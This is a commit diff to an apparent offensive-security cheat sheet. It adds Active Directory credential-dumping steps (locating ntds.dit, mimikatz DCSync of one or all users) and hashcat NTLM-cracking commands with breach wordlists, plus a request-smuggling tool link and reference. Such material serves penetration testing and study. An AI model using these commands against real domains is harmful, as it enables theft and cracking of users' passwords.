NTLM Hashcat

Methodology and Resources/Active Directory Attack.md

@@ -539,9 +539,19 @@ New-GPOImmediateTask -TaskName Debugging -GPODisplayName VulnGPO -CommandArgumen
 ### Dumping AD Domain Credentials
 
 You will need the following files to extract the ntds : 
-- ntds file (C:\Windows\NTDS\ntds.dit)
+- NTDS.dit file
 - SYSTEM hive (C:\Windows\System32\SYSTEM)
 
+Usually you can find the ntds in two locations : `systemroot\NTDS\ntds.dit` and `systemroot\System32\ntds.dit`.
+- `systemroot\NTDS\ntds.dit` stores the database that is in use on a domain controller. It contains the values for the domain and a replica of the values for the forest (the Configuration container data).
+- `systemroot\System32\ntds.dit` is the distribution copy of the default directory that is used when you install Active Directory on a server running Windows Server 2003 or later to create a domain controller. Because this file is available, you can run the Active Directory Installation Wizard without having to use the server operating system CD.
+
+However you can change the location to a custom one, you will need to query the registry to get the current location.
+
+```powershell
+reg query HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v "DSA Database file"
+```
+
 #### Using ndtsutil
 
 ```powershell
@@ -653,7 +663,11 @@ cme smb 10.10.0.202 -u username -p password --ntds drsuapi #default
 Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data. 
 
 ```powershell
+# DCSync only one user
 mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt
+
+# DCSync all users of the domain
+mimikatz# lsadump::dcsync /domain:htb.local /all /csv
 ```
 
 :warning: Read-Only Domain Controllers are not allowed to pull password data for users by default.
@@ -668,6 +682,30 @@ sekurlsa::krbtgt
 lsadump::lsa /inject /name:krbtgt
 ```
 
+#### Crack NTLM hashes with hashcat
+
+Useful when you want to have the clear text password or when you need to make stats about weak passwords.
+
+Recommended wordlists:
+- rockyou (available in Kali Linux)
+- Have I Been Powned (https://hashes.org/download.php?hashlistId=7290&type=hfound)
+- Collection #1 (passwords from Data Breaches, might be illegal to possess)
+
+```powershell
+# Basic wordlist
+# (-O) will Optimize for 32 characters or less passwords
+# (-w 4) will set the workload to "Insane" 
+$ hashcat64.exe -m 1000 -w 4 -O -a 0 -o pathtopotfile pathtohashes pathtodico -r ./rules/best64.rule --opencl-device-types 1,2
+
+# Generate a custom mask based on a wordlist
+$ git clone https://github.com/iphelix/pack/blob/master/README
+$ python2 statsgen.py ../hashcat.potfile -o hashcat.mask
+$ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H.hcmask
+```
+
+:warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like :
+- [hashes.org](https://hashes.org/check.php)
+- [hashes.com](https://hashes.com/en/decrypt/hash)
 
 ### Password spraying
 

Request Smuggling/README.md

@@ -2,11 +2,15 @@
 
 ## Summary
 
+* [Tools](#tools)
 * [CL.TE vulnerabilities](#cl.te-vulnerabilities)
 * [TE.CL vulnerabilities](#te.cl-vulnerabilities)
 * [TE.TE behavior: obfuscating the TE header](#te.te-behavior-obfuscating-the-te-header)
 * [References](#references)
 
+## Tools
+
+* [HTTP Request Smuggler / BApp Store](https://portswigger.net/bappstore/aaaa60ef945341e8a450217a54a11646)
 
 ## CL.TE vulnerabilities
 
@@ -101,3 +105,4 @@ Challenge: https://portswigger.net/web-security/request-smuggling/lab-ofuscating
 ## References
 
 * [PortSwigger - Request Smuggling](https://portswigger.net/web-security/request-smuggling)
+* [A Pentester's Guide to HTTP Request Smuggling - Busra Demir - 2020, October 16](https://blog.cobalt.io/a-pentesters-guide-to-http-request-smuggling-8b7bf0db1f0)